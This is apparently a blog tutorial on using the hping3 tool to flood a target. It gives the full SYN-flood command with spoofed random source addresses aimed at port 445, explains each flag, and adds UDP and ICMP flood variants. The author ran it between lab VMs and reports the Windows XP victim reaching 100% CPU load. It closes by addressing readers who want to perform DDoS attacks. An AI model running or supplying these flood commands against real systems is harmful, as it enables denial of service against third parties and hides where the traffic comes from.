First of all, what is hping command in linux ? Hping is a command-line oriented TCP/IP packet assembler/analyzer. There are many uses of hping in the world of IT security.
Usage of Hping :
- Firewall Testing
- Advanced Port Scanning
- Network testing using different protocol
- Manual Path MTU discovery
- Advanced trace route
- Remote OS fingerprinting
- Remote uptime guessing
- TCP/IP stack auditing
In this case, i will show the hping usage in performing DDoS attack. Please note that in this example I will use hping3 and all the command is executed in VM attacking another VM. The main command to use hping as DDoS is :
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 –flood –rand-source (Victim IP)
-V : Verbose Mode is an option to provides additional details as to what the computer is doing and what drivers and software it is loading
-c : packet count (in this case the packet count is 1000000)
-d : data size, in this case the data size is 120
-S : set SYN flag
-w : windows size, in this case the windows size is 64
-p : port, in this case the destination port is 445
-s : base source port, in this case the source port displayed will be port 445
–flood : flood mode, send packets as fast as possible and will not show replies
–rand-source : random the source address mode (Spoofing)
This is hping DDoS attack in action. In this screen shot you can see i made many mistake in typing the first 5 command but this is learning process so mistake will only make you better.
As you can see, the target OS(Windows XP SP3) process reach 100% and it will give the victim very heavy work load (slow PC, lagging).
This is the WireShark preview in the target OS :
As you can see in the wireshark log, there are massive connection to 192.168.5.129 (victim IP) from many source targeting the port 445 of the target. In this case, the source is randomised by the hping (using –rand-source) command. The default protocol while using hping DDoS is NBNS protocol.
However, hping can use another protocol of attacking such as:
UDP : hping3 –flood –rand-source –udp -p 445 (Victim IP) <– Stated by –udp command
ICMP : hping3 –flood –rand-source –icmp -p 445 (Victim IP) <– Stated by –icmp command
Thats all for this week. Hope this will help all of you out there who want to learn how to use hping to perform DDoS attack.